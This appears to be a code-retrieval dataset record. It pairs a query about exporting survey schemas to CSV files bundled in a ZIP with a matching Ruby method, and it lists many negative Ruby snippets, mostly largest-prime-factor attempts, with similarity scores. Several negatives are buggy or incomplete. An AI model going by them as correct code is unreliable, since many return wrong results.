"def largest_prime_factor(num)\n num.downto(1).each do |divisor|\n if num % divisor == 0 && isprime?(divisor)\n return divisor\n end\n end\n return 1\nend",
"def largest_prime_factor(num)\n num.downto(1) do |n|\n if num % n == 0 && prime?(n)\n return n\n end\n end\nend",
"def largest_prime_factor(num) \n num.downto(2).each do |factor|\n if num % factor == 0 && isPrime(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n (1..num).reverse_each do |factor|\n if num % factor == 0 && prime?(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n i = num\n while i > 0\n if num%i == 0 && prime?(i)\n return i\n end\n i -= 1\n end\nend",
"def largest_prime_factor(num,prime_factors,recursive)\n candidate = 2\n until candidate >= Math.sqrt(num)\n recursive = false\n if num % candidate == 0\n num = num / candidate\n recursive = true\n prime_factors << candidate\n largest_prime_factor(num,prime_factors,recursive)\n end\n break if recursive\n candidate == 2 ? candidate += 1 : candidate += 2\n end\n prime_factors << num unless recursive\n prime_factors.last\nend",
"def largest_prime_factor(num)\n i = num - 1\n\n while i > 1 \n if is_prime?(i) && num % i == 0\n return i \n end\n i -= 1\n end\n \n num\nend",
"def largest_prime_factor(num)\n i = num - 1\n while i >= 2\n if num % i == 0 && is_prime?(i) == true\n return i\n end\n i -= 1\n end\n num\nend",
"def largest_prime_factor(number)\n factor = 1\n\n while factor <= number\n if number % factor == 0\n return number / factor if is_prime?(number / factor)\n end\n factor += 1\n end\nend",
"def largest_prime_factor(num)\n return nil if num <= 1\n (2..num).reverse_each do |n|\n return n if prime?(n) && num%n == 0\n end\nend",
"def largest_prime_factor(num)\n num.downto(2) do |i|\n return i if (num % i).zero? && prime(i)\n end\nend",
"def largest_prime_factor(num)\n\n def prime?(num)\n return false if num < 2\n\n (2...num).each do |n|\n if num % n == 0\n return false\n end\n end\n\n true\n end\n\n if prime?(num)\n return num\n end\n\n (num.downto(2)).each do |i|\n if prime?(i) && num % i == 0\n return i\n end\n end\nend",
"def largest_prime_factor(num)\n divisor = 1\n\n (2..num).each do |i|\n if num % i == 0 && is_prime?(i)\n divisor = i\n end\n end\n\n divisor\nend",
"def largest_prime_factor\n number = 600851475143\n n = 2\n while n < number\n if number % n == 0\n factor = number / n\n return factor if is_prime?(factor)\n end\n n += 1\n end\nend",
"def get_largest_prime_factor num\n get_largest_number(prime_factor_numbers(num))\nend",
"def max_prime_factor(num)\n return num if num == 1 || num < 1\n max_num = (num ** 0.5 + 1).to_i\n f = (2..max_num).find { |x| num % x == 0 } || num\n [f, max_prime_factor(num / f)].max\nend",
"def largest_prime_factor (num)\n largest = 1\n (2..num).each do |ele|\n if num % ele == 0 && prime?(ele) && largest < ele\n largest = ele\n end\n end\n return largest\nend",
"def highest_prime_of(factors)\n factors.each do |factor|\n if check_prime(factor)\n return factor\n end\n end\nend",
"def largest_prime_factor(num)\n return num if prime?(num)\n\n prime_factors(num).max\nend",
"def largest_prime_factor(input)\n\n prime = input\n (2..Math.sqrt(input).to_i).each do |i|\n break if prime <= 1\n prime /= i while (prime > i && prime % i == 0)\n end\n prime\nend",
"def largest_prime_factor(num)\n lnum = nil\n (2..num).each do |factor|\n if num % factor == 0 && prime?(factor)\n lnum = factor\n end\n end\n lnum\nend",
"def largest_prime_factor(num)\n counter = 2\n biggestFactor = 0\n while (counter * counter) <=num\n if num % counter == 0\n num = num / counter\n biggestFactor = counter\n else\n counter+=1\n end\n end\n\n if (num > biggestFactor)\n biggestFactor = num\n end\n biggestFactor\nend",
"def largest_prime_factor num\n divisors = []\n max = 0\n\n (1..num).each { |el| divisors << el if num % el === 0 && isPrime(el)}\n\n max = divisors[0]\n\n divisors.each do |el|\n max = el if el > max \n end\n\n max\nend",
"def largest_prime_factor(number)\n prime = 2\n max = 1\n while (prime <= number)\n if(number % prime == 0)\n max = prime\n number = number/prime\n else\n prime += 1\n end\n end\n max\nend",
"def largest_prime_factor(num)\n big = 0\n prime = 0\n \n return false if num < 2\n\n # num is the only prime\n return num if prime?(num)\n \n # loops in reverse and returns the largest and first divisible prime\n j = num - 1\n while j > 1\n if num % j == 0 && prime?(j)\n return j\n end\n j -= 1\n end\nend",
"def largest_prime_factor_of(num)\n max = num\n test = 3\n best = 1\n\n while (max >= test) do\n if max % test == 0\n best = test\n max = max / test\n else\n test += 2\n end\n end\n best\nend",
"def find_highest_prime_factor(n)\n # Read http://joezack.com/index.php/2009/01/15/project-euler-problem-3-in-ruby/ - which points out you can\n # stop searching at the square root of a number. Speedup!\n (Math.sqrt(n).ceil).downto 2 do |i|\n if n % i == 0 && find_highest_prime_factor(i) == 1\n return i\n end\n end\n 1\nend",
"def largest_prime_factor(num)\n (0..num).reduce { |acc, n| prime?(n) && (num % n).zero? ? n : acc }\nend",
"def largest_prime_factor(n)\n recursive_prime_factors(n)\n PRIMES.keys.sort().last\nend",
"def largest_prime_factor(number)\n # divide by the smallest prime number (2) until\n # number is no longer divisble by the given prime number\n\n # iterate to the next (prime) number\n # divide and repeat\n # the forumula will return the largest prime factor\n\n prime_number = 2\n counter = 0\n\n while prime_number != number\n if number % prime_number == 0\n number /= prime_number\n else\n prime_number += 1\n end\n \n end\n prime_number\nend",
"def largest_prime_factor(number)\n\tlargest_pfactor = number\n\tfactor = 2\n\twhile(factor <= (largest_pfactor / 2)) do\n\t\tif(largest_pfactor % factor == 0)\n\t\t\tlargest_pfactor = largest_pfactor / factor\n\t\telse\n\t\t\tfactor = factor + 1\n\t\tend\n\tend\n\tlargest_pfactor\nend",
"def largest_prime_factor(num)\n num.prime_division.last[0]\n end",
"def prime_factors(num)\n factors = num.prime_division\n factors.to_a\n largest_factor = factors[-1][0]\n p largest_factor\nend",
"def largest_prime_factor(n)\n divisor = 2\n while(divisor <= n)\n n%divisor == 0 ? n = n/divisor : divisor += 1\n end\n divisor\nend",
"def largest_prime_factor(num)\n factors = []\n half_of_num = num / 2\n\n (2..half_of_num).each do |factor|\n if num % factor == 0\n factors << factor\n num = num / factor\n end\n end\n factors.max\nend",
"def largest_prime_factor(num)\n\ti=2 \n\tquotient = 0\n\twhile(quotient != 1) do\n\t\ti +=1\n\t\tif(is_prime?(i) && (num % i == 0))\n\t\t\tdivisor = quotient == 0 ? num : quotient\n\t\t\tquotient = divisor / i\n\t\tend\t\n\tend\n\treturn i \nend",
"def largestPrimeFactor(num)\n\t(2..num).each do |n|\n\t\treturn num if num <= n\n\t\tnum /= n if (num > n && num % n == 0)\n\tend\nend",
"def largest_prime_factor(num)\n divisors = []\n (2..num).each do |divisor|\n if num % divisor == 0\n if prime?(divisor)\n divisors << divisor\n end\n end\n end\n divisors[-1]\nend",
"def largest_prime_factor(n)\n i = 2\n largest = 0\n while i <= n\n if n % i == 0\n while n % i == 0\n n = n / i\n largest = i\n i += 1\n end\n end\n i += 1\n end\n return largest\nend",
"def largest_prime_factor(n, r = [])\n prime = Prime.lazy\n r = r || []\n if n.prime?\n r << n\n return r\n else\n factor = prime.find { |j| n % j == 0 } # 用find,找到第一个就结束\n r << factor\n prime.rewind\n largest_prime_factor (n / factor), r\n end\n r.max\nend",
"def largest_prime_factor(num)\n factors = (1..num).select { |factor| num % factor == 0}\n large_prime = factors.reverse.select { |i| return i if prime?(i)}\nend",
"def largest_prime_factor(num)\n primes = []\n (1..num).each do |n|\n primes << n if num % n == 0 && is_prime?(n)\n end\n primes.max\nend",
"def largest_prime_factor(num)\n factors = []\n\n (1..num).each do |i|\n if num % i == 0\n factors << i \n end\n end\n\n primes = []\n factors.each do |num|\n if is_prime?(num)\n primes << num \n end\n end\n\n primes.max\nend",
"def largest_prime_factor(num)\n prime_factors = []\n (2..num).each do |n|\n prime_factors << n if prime?(n) && num % n == 0\n end\n prime_factors[-1]\nend",
"def largest_prime_factor(num)\n return nil if num < 2\n (1..num).inject do |acc, fact|\n if num % fact == 0 && prime?(fact) && fact >= acc\n fact\n else\n acc\n end\n end\nend",
"def largest_prime_factor(num)\n largest = num\n variable_num = 2\n\n while variable_num < largest\n while largest % variable_num == 0 && largest != variable_num\n largest = largest / variable_num\n end\n variable_num += 1\n end\n return largest\nend",
"def largest_prime_factor( x ) \n require 'mathjb'\n primes = primes_below(x)\n i = 0\n \n until primes.include?(x)\n div = primes[i]\n if x % div == 0 then\n x /= div #if div is a factor of x, set x to x / div\n i = 0\n else\n i += 1\n end\n end\n return x\nend",
"def largest_prime_factor(input)\n factors = []\n (1..input).each do |x|\n if input % x == 0\n factors << x\n x += 1\n else\n x == input\n break\n end\n end\nend",
"def largest_prime_factor n\n max_prime = -1\n i = 3\n # check if n is product of 2's. then the max prime is 2. and n will be 1 at the end.\n while n % 2 == 0\n max_prime = 2\n n /= 2\n end\n\n #if n is produc of 3's , then the max prime is 3, and n will be 1 at the end.\n #if n is not product of 3's, it contains other prime factors. these factors must be greater\n #than 3 because we alreay excluded 2's in the previous step. and we have excluded 2's multiples in the\n #previous steps, so only need to check the odd numbers for possible factors.\n while i*i <= n\n while n % i == 0\n max_prime = i\n n /= i\n end\n i += 2\n end\n\n if n > 2\n max_prime = n\n end\n max_prime\nend",
"def largest_prime_factor(num)\n \n (1..num).inject do |largest_factor, factor|\n if num % factor == 0 && prime?(factor)\n largest_factor = factor\n else\n largest_factor\n end\n end\nend",
"def largest_prime_factor(input)\n lpf = 2\n\n while lpf < input\n\n if input % lpf == 0\n\n input = input / lpf\n lpf = 2\n else\n lpf += 1\n end\n end\n\n return lpf\nend",
"def largest_factor(number)\n result = prime_factors(number).sort\n result[-1]\nend",
"def largest_prime_factor(num)\n puts \"num = #{num}\"\n Prime.first(num).select {|i| i}\nend",
"def greatest_prime_factor(n)\n return false if n < 1\n divisor = Math.sqrt(n).floor\n\n while divisor>=2\n return divisor if prime?(divisor) && n%divisor==0\n divisor-=1\n end\n return false\nend",
"def largest_factor(n)\n\n result = nil\n (1 .. n/2).each do |d|\n if n % d == 0\n result = d\n end\n end\n\n result\nend",
"def my_largest_prime(num)\n counter = 2\n until num == 1\n if num % counter == 0\n sol = counter\n num /= counter\n else\n counter += 1\n end\n end\n return sol\nend",
"def largestPrimeFactor\n\tn = 600851475143\n\tfactor = 2\n\tlastFactor = 1\n\n\twhile n > 1\n\t\tif n % factor == 0\n\t\t\tlastFactor = factor\n\t\t\tn /= factor\n\t\t\twhile n % factor == 0\n\t\t\t\tn /= factor\n\t\t\tend\n\t\tend\n\n\t\tfactor += 1\n\tend\n\n\tputs(lastFactor)\nend",
"def greatest_factor(num)\n (2...num).reverse_each { |i| return i if num % i == 0}\nend",
"def three num\n max = 0\n acc = 1\n for i in 2..num\n if num % i == 0 #first check if i divides the number\n if isPrime?(i) #then check if it is prime (part of the prime factorization)\n max = i #keep the max so far\n temp = num #this loop is for numbers made up of many of the same prime i.e. 2^32\n while (temp % i == 0)\n temp = temp / i\n acc = acc * i\n if acc == num\n return max\n end\n end\n end\n end\n end\n return max\nend",
"def largest_prime_factor(input)\n prime = input\n (2..Math.sqrt(input).to_i).each do |i|\n # Here we use the square root function to cut our range down drastically\n break if prime <= 1\n while (prime > i && prime % i == 0) do\n prime /= i\n puts \"prime - #{prime}, i - #{i}\"\n end\n end\n prime\nend",
"def larget_prime_factor(n)\n temp = n\n largest = 0\n div = 2\n\n while temp >= div * div\n if temp % div == 0\n temp /= div\n else\n div += 1\n end\n end\n\n largest = temp if temp > largest\n return largest\nend",
"def largest_prime(int)\n def is_prime?(int)\n div = 2\n until div >= int\n return false if int % div == 0\n div += 1\n end\n true\n end\n remainder = int\n divider = 2\n prime_factors = []\n while divider < remainder\n if remainder % divider == 0 && is_prime?(divider)\n prime_factors << divider\n remainder /= divider\n end\n divider += 1\n end\n prime_factors << remainder\n puts prime_factors\n prime_factors.max\nend",
"def largest_prime_factor(number)\n\tfactors = []\n\n\t(1...number).each do |i| \n\t\tif number % i == 0 && Prime.prime?(i)\n\t\t\tfactors.push(i)\n\t\tend\n\tend\n\tfactors.last\nend",
"def largest_prime_factor(current_number)\n\tprime_factors = []\n\ti = 2\n\twhile current_number > 1\n\t\twhile current_number % i == 0\n\t\t\tprime_factors << i\n\t\t\tcurrent_number /= i\n\t\tend\n\t\ti += 1\n\tend\n\treturn prime_factors.last\nend",
"def largest_prime(number)\n is_prime = false\n current_num = number\n divisor = 2\n max_prime = 1\n\n while is_prime != true && divisor <= current_num\n if current_num % divisor === 0\n current_num /= divisor\n if divisor > max_prime\n max_prime = divisor\n end\n divisor = 2\n else\n divisor += 1\n end\n\n if divisor > current_num\n is_prime = true\n end\n end\n\n puts max_prime\n return max_prime\nend",
"def highest_prime_number_under(number)\n\nend",
"def find_largest_prime(n)\n while true\n smallest_prime = find_smallest_prime(n)\n if smallest_prime < n\n n /= smallest_prime\n else\n return n\n end\n end\nend",
"def primeFactors(x)\n\tlargestFactor = 1\n\tcurrentFactor = 1\n\twhile currentFactor <= x # limit of the problem\n\t\tif x % currentFactor == 0 \n\t\t\tx = x / currentFactor\n\t\t\tif currentFactor > largestFactor\n\t\t\t\tlargestFactor = currentFactor\n\t\t\t\tcurrentFactor = 0\n\t\t\tend\n\t\tend\n\t\tcurrentFactor += 1\n\tend\n\treturn largestFactor\nend",
"def largest_prime(number)\r\n limit = Math.sqrt(number).floor \r\n (2..limit).select { |n| number % n == 0 && Prime.prime?(n) }.max\r\nend",
"def prime?(integer)\nn = integer\nif n < 1 then raise ArgumentError.new(\"Positive integers only\")\nend\nlargest_factor = nil\nfor i in 2..(n/2)\n\tif (n % i) == 0\n\t\tlargest_factor = i\n\tend\nend\n\nlargest_factor ||= n \nend",
"def prime_factor\n max = 600851475143**0.5\n\n for i in (1..max).step(2)\n if 600851475143 % i == 0\n if is_prime(i)\n ans = i\n end\n end\n end\n ans\nend",
"def highest_prime_number_under(number)\n until is_prime?(number)\n number -= 1\n end\n number\nend",
"def largest_prime(num)\n largest_prime = 0\n i = 2\n while i * i <= num\n if num % i == 0\n num /= i\n largest_prime = i\n else\n i += 1\n end\n end\n\n if num > largest_prime\n largest_prime = num\n end\n\n largest_prime\nend",
"def largest_prime_number(upper)\n answer = 2\n point = 3\n divisor = upper\n\n divisor /= 2 while divisor.even?\n\n while divisor != 1\n while (divisor % point) == 0\n answer = point\n divisor /= point\n end\n point += 2\n end\n answer\nend",
"def highest_prime_number_under(number)\n highest_prime = 0\n for num in 1..number\n if is_prime?(num) && num > highest_prime\n highest_prime = num\n end\n end\n return highest_prime\nend",
"def largest_prime_factor(num)\n #prime_division returns an array of 2 element arrays containing prime factorization - [[2, 1], [5, 2]]\n #flat_map contatenates the 2 element arrays into a single array [2, 5, 5]\n array = Prime.prime_division(num).flat_map { |factor, power| [factor] * power }\n\n largest = 0\n array.each do |i|\n if i > largest\n largest = i\n end\n end\n return largest\nend",
"def highest_prime_number_under(number)\n counter = number\n number.times do\n if is_prime?(counter)\n p counter\n break\n else\n counter -= 1\n end\n end\nend",
"def highest_prime_number_under(number)\n highest_prime_number_under = 0\n ary = (number-1).downto(2).to_a\n ary.each do |x|\n counter = 0 \n (2..(x-1)).each do |num|\n if ( x % num ) == 0\n counter += 1\n else\n counter = counter\n end \n end \n \n if counter > 0 \n highest_prime_number_under = 0\n else \n highest_prime_number_under = x\n p \"The highest prime number under #{number} is \" + x.to_s\n break\n end\n end \nend",
"def find_largest_prime(integer)\n factor_array = []\n potential_factor_array = (2..integer).to_a\n potential_factor_array.each do |factor|\n if integer % factor == 0\n factor_array << factor\n end\n end\n largest_factor = factor_array.last\n potential_factor_array = (2..largest_factor).to_a\n potential_factor_array.each do |potential_factor|\n factor_array.each do |factor|\n if factor != potential_factor && factor % potential_factor == 0\n factor_array.delete(factor)\n end\n end\n end\n p factor_array.last\nend",
"def largest_prime(n) #600851475143\r\n p = 0\r\n i = 5\r\n nums = []\r\n while i*i < n\r\n if n % i == 0\r\n nums << i\r\n end\r\n\r\n i += 1\r\n end\r\n\r\n nums.reverse_each do |num|\r\n if prime?(num)\r\n return num\r\n end\r\n end\r\n\r\nend",
"def greatest_factor(num)\n\n return num / 2\n\nend",
"def print_primes(num)\r\n\tlargest_div = 2;\t\t\t\r\n\twhile num > 1\r\n\t\tdiv = 2;\r\n\t\twhile num % div != 0\r\n\t\t\t\tdiv += 1\r\n\t\tend\r\n\t\tnum = num / div\r\n\t\tlargest_div = div\r\n\tend\r\n\treturn largest_div\r\nend",
"def highest_prime_number_under(number)\n prime = number - 1\n counter = 1\n until is_prime?(prime)\n prime -= 1\n end\n return prime\n end",
"def factor_primes(num)\n\n return \"Not a valid number\" if num < 2\n\n for divisor in 2..(num - 1)\n while num % divisor == 0 \n (divisor * divisor > num) ? (return num) : (num /= divisor)\n # puts \"The divisor is #{divisor}\"\n # puts \"The new num is #{num}\"\n end\n end\n puts \"only divisible by 1 and itself\"\nend",
"def get_first_prime_factor(limit)\n (2..limit).each do |rangeNum|\n if isPrime?(rangeNum) && isFactor?(rangeNum, limit)\n return rangeNum\n end\n end\nend",
"def largest_prime_factor(number)\n # start with the number and go backwards\n while number > 0\n numb_split = number.to_s.split('')\n numb_split_length = numb_split.length\n #p numb_split[numb_split_length - 1]\n if numb_split[numb_split_length - 1] == \"5\" || numb_split[numb_split_length - 1] == \"0\" \n\n \n elsif number%2 == 0 && number > 2 \n # definitely not prime\n elsif number%2 == 0 && number%3 == 0\n \n \n else\n # test if number is prime\n # if number is prime\n \n\n p number.to_s\n end\n number -= 1 \n end\n\nend",
"def largest_prime(n)\n i = 2\n largest = 0\n while (i <= n)\n if (n % i == 0)\n while (n % i == 0 )\n n = n / i\n largest = i\n puts \"I am n #{n}\"\n puts \"I am i #{i}\"\n i += 1\n end\n end\n i += 1\n end\n return largest\nend",
"def highest_possible_factor\n Math.sqrt(number)\n end",
"def highest_possible_factor\n Math.sqrt(number)\n end",
"def largest_factor(n)\n arr = []\n num = 1\n while num < n \n if n % num == 0\n arr << num \n end\n num+=1\n end\n arr[-1]\nend",
"def factor_primes(num)\n\n ctr = num/2\n\n while ctr > 1\n if num%ctr == 0\n # if here then ctr is a factorial, now need to determine if this value is also a prime number\n is_prime = true\n for d in 2..(ctr - 1)\n if (ctr % d) == 0\n is_prime = false\n end\n end\n if is_prime\n return puts \"#{ctr} is a factorial of #{num} and the highest prime number\"\n end\n end\n ctr -= 1\n end\n\nend",
"def max_factor(n)\n\tfactors = [1, n]\n\tidx = 2\n\twhile idx < factors[-1]\n\t\tif factors[-1] % idx == 0\n\t\t\tnew = factors[-1] / idx\n\t\t\tfactors.pop\n\t\t\tfactors.push(idx)\n\t\t\tfactors.push(new)\n\t\t\tidx = 1\n\t\tend\n\t\tidx += 1\n\tend\n\treturn factors[-1]\nend",
"def getMaxPrime(numb)\n def isPrime(n)\n return false if n <= 1\n 2.upto(Math.sqrt(n).to_i) do |x|\n return false if n%x == 0\n end\n true\n end\n\n primes = []\n (2..10000).each { |x| primes << x if isPrime(x) }\n \n max = 0\n primes.each do |i|\n if numb % i == 0\n max = i\n end\n end\n puts max\nend",
"def largest_pfactor(number)\n i=2\n\n while i<=number\n\n if i==number\n puts number\n elsif number%i == 0\n number=number/i\n puts i\n i=2\n end\n\n if i%2==0\n i+=1\n else\n i+=2\n end\n\n end\n\nend",
"def prime_factors(n)\r\n num=Math.sqrt(n).round\r\n while num>0\r\n if n%num==0\r\n return num if prime?(num)\r\n end\r\n num-=1\r\n end\r\nend",
"def primo_factor(number)\t\n\n\tresult =[]\n\n\twhile number != 1\n\t\tfor i in 2..10000\n\t\t\tif number % i == 0 && number > 1\n\t\t\t\tresult << i\n\t\t\t\tnumber = number/i\t\t\t\n\t\n\t \t\tend\n\t\tend\n\tend\n\tputs \"The largest prime factor of #{number} is #{result.inspect}. Congrats!\"\n\nend",
"def prime_factorization(num)\n if is_prime?(num)\n return [num]\n end\n factors = []\n (2..num).each do |factor|\n if num % factor == 0\n factors << factor\n factors << prime_factorization(num/factor)\n \n break\n end\n end\n factors.flatten\n\nend",
"def smallest_multiple(n)\n def get_prime_factors(n, factors=[])\n return n if n.prime?\n \n Prime.first(n).each do |prime|\n if n % prime == 0\n factors << prime\n n /= prime\n break\n end\n end\n \n \n factors + [get_prime_factors(n)].flatten\n end\n \n def get_highest_exponents(n, factors=[])\n (2..n).each do |m|\n if get_prime_factors(m).is_a? Array\n factors << get_prime_factors(m)\n else\n factors << [m]\n end\n end\n \n highest = []\n Prime.first(n).select { |p| p < n }.each do |factor|\n highest << factors.sort_by { |f| f.count(factor) }[-1].select { |num| num == factor }\n end\n \n \n highest.flatten\n end\n\n\n get_highest_exponents(n).reduce(:*)\nend"
] |
[
"0.8718168",
"0.8678555",
"0.865899",
"0.8632884",
"0.86279887",
"0.8625121",
"0.86171204",
"0.86012983",
"0.86011016",
"0.8600345",
"0.85940826",
"0.85519683",
"0.85489714",
"0.8493698",
"0.84860057",
"0.8481071",
"0.8457284",
"0.8430555",
"0.8418677",
"0.8417911",
"0.84173393",
"0.8389803",
"0.83830005",
"0.836783",
"0.8353628",
"0.83421326",
"0.8339538",
"0.8329123",
"0.83141917",
"0.8311372",
"0.83080757",
"0.829703",
"0.8285651",
"0.82816905",
"0.8280453",
"0.8271972",
"0.82712054",
"0.82708865",
"0.82679015",
"0.82606894",
"0.8260549",
"0.825556",
"0.8228167",
"0.8177025",
"0.81577903",
"0.8153516",
"0.81514525",
"0.81334424",
"0.8105373",
"0.8102675",
"0.8096396",
"0.8088348",
"0.8056674",
"0.8047501",
"0.80473053",
"0.8013928",
"0.8009008",
"0.7967744",
"0.79610634",
"0.79603773",
"0.7956437",
"0.7944817",
"0.7892028",
"0.78770834",
"0.784638",
"0.7845164",
"0.7785145",
"0.7746739",
"0.7745141",
"0.7723353",
"0.77230203",
"0.76961774",
"0.7674946",
"0.76216364",
"0.75989693",
"0.7588915",
"0.75854594",
"0.75674874",
"0.7541412",
"0.7513098",
"0.7509706",
"0.750188",
"0.74815625",
"0.74636513",
"0.7430315",
"0.74243295",
"0.74017507",
"0.74010086",
"0.7374154",
"0.7329614",
"0.7329614",
"0.7326454",
"0.72816163",
"0.7280552",
"0.7239412",
"0.72294825",
"0.7216618",
"0.7199081",
"0.7185208",
"0.713994"
] |
0.72416675
|
94
|
create one or more CSV files (one CSV file per survey_schema) and archive them with ZIP
|
def create_zip_file(destination_file_name, csv_filenames_prefix, survey_schemas, administration_id)
  raise 'empty survey_schemas are unsupported' if survey_schemas.empty?

  working_dir = create_unique_dir
  # one CSV file per survey schema, all written into the same working directory
  csv_filepaths = create_csv_files(working_dir, csv_filenames_prefix, survey_schemas, administration_id)
  # bundle the CSVs into a single archive, then drop the now-redundant originals
  zip_files("#{working_dir}/#{destination_file_name}", csv_filepaths)
  remove_files(csv_filepaths)
  "#{working_dir}/#{destination_file_name}" # path of the finished ZIP
end
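
The four helpers this method calls (create_unique_dir, create_csv_files, zip_files, remove_files) are not shown in this entry. Below is a minimal sketch of what they could look like, assuming the rubyzip gem for archiving; the id, column_names, and rows_for accessors on a survey schema are hypothetical placeholders for however the rows are actually produced.

require 'csv'
require 'tmpdir'
require 'zip' # rubyzip

def create_unique_dir
  Dir.mktmpdir # fresh working directory per export
end

def create_csv_files(working_dir, prefix, survey_schemas, administration_id)
  survey_schemas.map do |schema|
    path = File.join(working_dir, "#{prefix}_#{schema.id}.csv")
    CSV.open(path, 'w') do |csv|
      csv << schema.column_names                       # hypothetical header accessor
      schema.rows_for(administration_id).each do |row| # hypothetical row accessor
        csv << row
      end
    end
    path
  end
end

def zip_files(zip_path, csv_filepaths)
  # each CSV is stored under its basename at the root of the archive
  Zip::File.open(zip_path, Zip::File::CREATE) do |zip|
    csv_filepaths.each { |path| zip.add(File.basename(path), path) }
  end
end

def remove_files(paths)
  paths.each { |path| File.delete(path) }
end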
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def generate_records_file(format)\n file = Tempfile.new(\"patients-#{Time.now.to_i}\")\n patients = Record.where(\"test_id\" => self.id)\n \n if format == 'csv'\n Cypress::PatientZipper.flat_file(file, patients)\n else\n Cypress::PatientZipper.zip(file, patients, format.to_sym)\n end\n \n file\n end",
"def generate_records_file(format)\n file = Tempfile.new(\"patients-#{Time.now.to_i}\")\n patients = Record.where(\"test_id\" => self.id)\n Cypress::PatientZipper.zip(file, patients, format.to_sym)\n\n file\n end",
"def create_csvs(csv_count)\n for num in 1..csv_count\n headers = filtered_schema_headers(num)\n CSV.open(\"data#{num}.csv\", \"w\",:write_headers => true, :headers => headers) do |csv|\n populate_csv(csv, headers)\n end\n end\n end",
"def create_archive\n created = false\n empty = true\n Dir.mktmpdir do |tmpdir|\n # create manifest\n tmpmf = File.join(tmpdir, DulHydra.export_set_manifest_file_name)\n # create the zip archive\n zip_name = \"export_set_#{Time.now.strftime('%Y%m%d%H%M%S')}.zip\"\n zip_path = File.join(tmpdir, zip_name)\n Zip::ZipFile.open(zip_path, Zip::ZipFile::CREATE) do |zip_file|\n CSV.open(tmpmf, 'wb') do |manifest|\n manifest << archive_manifest_header\n pids.each do |pid|\n # get Fedora object\n begin\n object = ActiveFedora::Base.find(pid, :cast => true) \n # skip if object is not content-bearing or user lacks :read permission\n next unless object.has_content? and user.can?(:read, object)\n content_ds = object.datastreams[DulHydra::Datastreams::CONTENT]\n # use guaranteed unique file name based on PID and dsID \n temp_file_path = File.join(tmpdir, content_ds.default_file_name)\n # write content to file\n File.open(temp_file_path, 'wb', :encoding => 'ascii-8bit') do |f|\n content_ds.write_content(f)\n end\n # Use original source file name, if available; otherwise the generated file name\n # Note that we keep the path of the source file in order to reduce likelihood\n # name conflicts, and since it is easy to flatten zip contents on extraction.\n # However, we don't want the path of the generated temp file, just the basename.\n file_name = object.source.first || File.basename(temp_file_path)\n # discard leading slash, if present\n file_name = file_name[1..-1] if file_name.start_with? '/'\n # add file to archive\n zip_file.add(file_name, temp_file_path)\n # add row to manifest\n manifest << archive_manifest_row(file_name, object)\n rescue ActiveFedora::ObjectNotFoundError => e\n logger.error e\n next\n end\n end # document_list\n end # manifest\n # check if the zip file is emtpy\n empty = (zip_file.size == 0)\n # write manifest \n zip_file.add(DulHydra.export_set_manifest_file_name, tmpmf) unless empty\n end # zip_file\n # update_attributes seems to be the way to get paperclip to work \n # when not using file upload form submission to create the attachment\n created = !empty && update_attributes({:archive => File.new(zip_path, \"rb\")})\n end # tmpdir is removed\n created\n end",
"def export\n @survey = ISurvey.find_by_id(params[:id])\n if @survey.present?\n respond_to do |format|\n format.text {\n result = prepareData(params)\n render text: to_csv(result)\n }\n format.csv {\n result = prepareData(params)\n render text: result\n }\n format.zip {\n require 'zip'\n\n compressed_filestream = Zip::OutputStream.write_buffer(::StringIO.new('')) do |zos|\n zos.put_next_entry \"data-set-#{params[:id]}.csv\"\n result = prepareData(params)\n csv = to_csv(result)\n zos.print csv\n\n zos.put_next_entry \"import_command.sps\"\n zos.print File.read(Rails.root.join(\"spss/import_command.sps\"))\n\n zos.put_next_entry \"student_pre_format.tpf\"\n zos.print File.read(Rails.root.join(\"spss/student_pre_format.tpf\"))\n end\n\n compressed_filestream.rewind\n send_data compressed_filestream.read, filename: \"SPSS-Archive-#{Time.now.strftime(\"%-d_%-m_%y-%P\")}.zip\"\n }\n format.json {\n result = prepareData(params)\n render json: result\n }\n format.html {\n\n }\n end\n else\n redirect_to answers_path, notice: \"Couldn't find the survey for that ID.\"\n end\n end",
"def create_csv\n CSV.open('./data/slcsp.csv', 'wb') do |csv|\n csv << ['zipcode', 'rate']\n end\n build_csv\n end",
"def build_csv\n @zips_and_rates.each do |zip|\n CSV.open('./data/slcsp.csv', 'ab') do |csv|\n if zip[1].class == Array\n csv << [zip[0], nil]\n else\n csv << [zip[0], zip[1]]\n end\n end\n end\n end",
"def generate_all_csv_answers\n generate_csv_answers(csv_answers_values)\n end",
"def create_summary_csv(summary_csv_path)\n puts \"creating summary csv: #{summary_csv_path}\"\n\n CSV.open(summary_csv_path, \"wb\") do |csv|\n csv << SUMMARY_CSV_HEADINGS\n end\nend",
"def export_survey_answers(csv_survey_answers, survey_id)\n survey = Survey.find(survey_id)\n header = journal_csv_header.keys + survey.variables.map {|v| v.var}\n \n csv_rows = csv_survey_answers.inject([]) do |rows,csa|\n header_values = csa.journal_info.split(';;')\n rows << header_values + csa.answer.split(';;')\n rows\n end\n\n output = FasterCSV.generate(:col_sep => \";\", :row_sep => :auto, :encoding => 'u') do |csv_output|\n csv_output << header\n csv_rows.each { |line| csv_output << line }\n end\n end",
"def create_csv &block\n file = create_tempfile \"csv\"\n CSV.open file.path, \"w\", &block\n file\n end",
"def generate_csv\n\n fields = @resource[:class].typus_fields_for(:csv).collect { |i| i.first }\n\n require 'csv'\n if CSV.const_defined?(:Reader)\n # Old CSV version so we enable faster CSV.\n begin\n require 'fastercsv'\n rescue Exception => error\n raise error.message\n end\n csv = FasterCSV\n else\n csv = CSV\n end\n\n filename = \"#{Rails.root}/tmp/export-#{@resource[:self]}-#{Time.now.utc.to_s(:number)}.csv\"\n\n options = { :conditions => @conditions, :batch_size => 1000 }\n\n csv.open(filename, 'w', :col_sep => ';') do |csv|\n csv << fields\n @resource[:class].find_in_batches(options) do |records|\n records.each do |record|\n csv << fields.map { |f| record.send(f) }\n end\n end\n end\n\n send_file filename\n\n end",
